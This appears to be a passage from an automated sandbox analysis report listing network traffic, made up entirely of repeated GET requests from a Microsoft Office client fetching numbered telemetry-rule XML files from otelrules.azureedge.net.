          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
